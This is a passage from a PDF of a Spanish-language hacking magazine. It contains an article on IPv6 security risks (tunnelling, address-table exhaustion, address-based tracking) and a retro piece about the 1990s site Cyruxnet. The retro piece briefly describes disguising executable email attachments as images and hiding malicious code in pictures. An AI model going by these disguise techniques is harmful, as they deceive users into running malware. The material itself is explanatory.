Aún cuando físicamente se tenga una red local y se manejen servicios locales, se debe de tener siempre presente que con una dirección IPv6 se encuentra uno de frente al internet público, y por lo tanto al alcance de cualquier agente externo.

Si bien a cada usuario se le delegará un segmento IPv6 con considerable cantidad de direcciones para disponer de ellas, dependiendo de la forma en

Convivencia simultánea de múltiples protocolos

Accesodirecto

por IPv6

riesgos de seguridad en IPV6

www.hackingmexico.mx36

Page 39: Hacking Mexico

que la autonfiguración y parámetros de DHCP que tenga predeterminados de fábrica su equipo de red, se pueden tomar algunas deducciones para encon-trar otros equipos de red en un segmen-to perteneciente a un usuario.

El protocolo IPv6 integra de forma na-tiva la facilidad para establecer canales y tuneles encubiertos de comunicación buscando seguridad y privacidad de las comunicaciones, así como también con-tar con funciones de tunneling destinadas a ayudar a organizaciones a dar conecti-vidad IPv6 durante su periodo de transi-ción. Así también existen servicios públi-cos gratuitos para ofrecer a un usuario la posibilidad de dar salida a un tunel IPv6 desde su terminal.

Esto puede permitir se establezcan for-mas de comunicación desde dentro de o hacia sitios restringidos externos a la red encapsulando protocolos entre paquetes IPv6 o usando tuneles de salida remotos aprovechando la omisión de controlar lo que entra y sale usando protocolo IPv6 o algún protocolo de tuneleo como 6en4, 6a4, teredo, etc.

IPv6 corrige algunos errores de dise-ño de IPv4 que se traducian en vulne-rabilidades de seguridad muy díficiles de enfrentar, para lo cual a lo largo del tiempo se desarrollaron estrategias y tecnologías que eran opcionales imple-mentar, pero que al hacerlo se reducian

en gran medida riesgos severos como el caso de IPsec.Sin embargo, hay que recalcar que IPv6 en sí no es un protocolo orientado a la se-guridad, de manera que su implementa-ción de ninguna manera elimina riesgos por lo que hay que entender y aplicar todas las nuevas características que in-corpora para ayudar a mejorar el nivel de seguridad de una red.

Esta necesidad de conocer y aplicar las nuevas funcionalidades técnicas afectan a los servicios de red y sistemas a todos los niveles, desde la arquitectura y fun-ciones importantes de las redes de comu-nicaciones, la configuración de servicios en clientes y servidores, y en particular a los sistemas que se desarrollan ya que si bien pudieran funcionar de forma com-patible con IPv6 gracias al modelo de ca-pas, es posible que se introduzcan nuevos bugs y vulnerabilidades sólo por el hecho de convivir en un ambiente con ambos protocolos habilitados y por depender de mecanismos de protección externos ba-

Tuneleo y canalesfurtivos Tecnología

y serviciosinpreparados

riesgos de seguridad en IPV6

www.hackingmexico.mx 37

Page 40: Hacking Mexico

sados exclusivamente en lo que se puede lograr con IPv4.En pocas palabras, el diseño de la arquitec-tura de seguridad de un sistema tiene que contemplar que eventualmente funcionará también sobre redes y servidores con so-porte IPv6 y las pruebas de calidad y segu-

ridad del sistema deben de incluir casos de prueba contemplando el mismo escenario.Debido a que el protocolo IPv6 contem-pla 128 bits para designar el direcciona-miento, se espera que a cada usuario y red local se le delegen una enorme cantidad de direcciones IP para su uso a discreción del administrador del segmento.

Estas increibles cantidades de direccio-nes que se ponen sobre la mesa a partir de este momento, puede llegar a generar una situación de negación de servicio

para dispositivos de red o sistemas que levantan registros de las direcciones IP’s ya que al existir tantas, si por coinciden-cia o maliciosamente se ingresan en una red paquetes IP que lleven al limite las bitácoras y memorias internas de los dis-positivos que no serían capaces de alma-cenar tanta cantidad de registros.

De hecho este tipo de vulnerabilidad ha sido de las primeras que han sido docu-mentadas y se comienza a descubrir se encuentra presente en muchos productos comerciales y sistemas de redes con IPv6 listo. [] http://www.networkworld.com/

news/2011/050311-microsoft-juniper-ipv6.htmlSi bien la cantidad de direcciones IP dis-ponible es inmensa, una combinación de

funcionalidad técnica y políticas admi-nistrativas crean un escenario donde cada dirección IP pudiera llegar a quedar atada a una persona en particular:

Las funcionalidades comunes de DHCP que logran en muchos casos asignar siempre una misma dirección al mismo dispositivo.

Uno de los modos de autoconfiguración por default en muchos routers donde se toma la dirección MAC del dispositivo para con-formar la dirección IPv6 que se le asignará. Si se omite habilitar el modo de privacidad para la autoconfiguración y ofuscación de la dirección IP usada por el dispositivo.

Las políticas de cada NIC regional don-de se asignan bloques de direcciones IP en base a una localización geográfica por país, carrier, ISP, estado, región o ciudad.Es esperado en algún momento que cada usuario y dispositivo llegue a tener una dirección IPv6 fija de forma permanente, de manera que tiene que considerarse las

Saturaciónde recursos

Geolocalización y personalización de direcciones

www.hackingmexico.mx38

riesgos de seguridad en IPV6

Page 41: Hacking Mexico

implicaciones en cuanto a privacidad y registrabilidad.

Como en todo producto tecnológico de creación reciente, apenas está por iniciar su etapa de evaluación a gran escala por parte de los usuarios y entusiastas que la hackean hasta llevarla a sus límites, de manera que se tienen que tener durante un largo tiempo la expectativa del des-

cubrimiento de vulnerabilidades en el diseño del nuevo protocolo así como de las implementaciones de este en todos los productos comerciales que se usen.Una parte considerable de riesgos de

seguridad asociados a IPv6 proviene de desinteresarse de su ya presencia actual y no ver reflejada su consideración en los planes y políticas de seguridad.

Siendo una tecnología relativamente nue-va, se debe de tener preparación adecuada para su aplicación práctica y resolución de incidentes, siendo para muchos un área de expertise que tienen que desarrollar con urgencia debido a que antes de que se den cuenta ya estarán viendose en la necesidad de implementar servicios públicos de red por medio de este protocolo.

Tecnología naciente y vulnerabilidades por descubrir

Conclusiones

www.hackingmexico.mx 39

riesgos de seguridad en IPV6

Page 42: Hacking Mexico

Aqui recordaremos

con nostalgia los

viejos tiempos,

las técnicas

usadas, y eventos

importantes que ocurrieron en el

mundo del hack.

En esta ocasión hablaremos de

Cyruxnet, un portal informatico

que existio en los años 90’s

donde se publicaron por primera

vez técnicas exclusivas, tales

como ocultamiento de .exe’s en

mensajes de Outlook express, lo

cual consistía en agregar el valor

ASCII del espacio en blanco al

nombre del archivo después de la

extensión para hacerlo pasar por

un archivo inofensivo.

Algo asi de sencillo, lograba

que cuando vieras el archivo

adjunto en tu correo, pensaras que

se trataba de una foto, pero en

realidad era un ejecutable.

También fue de los primeros

sitios en publicar códigos de

esteganografía para ocultar código

malicioso dentro de fotos u otros

archivos. Un gran recurso de bugs

y exploits de la época, cuando la

información de este tipo era un

poco mas difícil de conseguir.

Old Sch

oo

lCyruxnet, un portal

informatico que existio en los

años 90’s donde se publicaron

por primera vez técnicas

exclusivas, tales como

ocultamiento de .exe’s

www.hackingmexico.mx

old school

40

Page 43: Hacking Mexico

www.hackingmexico.mx 41

seccion o articulo

Page 44: Hacking Mexico

www.hackingmexico.mx42

seccion o articulo

Page 45: Hacking Mexico

i n f o r m e s 5 5 1 0 6 8 8 8 0 9i n f o @ h a c k i n g m e x i c o . m x

I N T E G R A T E C O N N O S O T R O SU N E T E A N U E S T R O E Q U I P O D E C O L A B O R A D O R E S

Page 46: Hacking Mexico

#01

A quién le es llamado un Hacker

El manifiesto Hacker

Facebook: Explotando al ser humano

Vulnerabilidad de Mikrotik Http Proxy

NAVEGACIÓN ANONIMA

Hacking Microsft C#Hackintosh: jailbreak IOS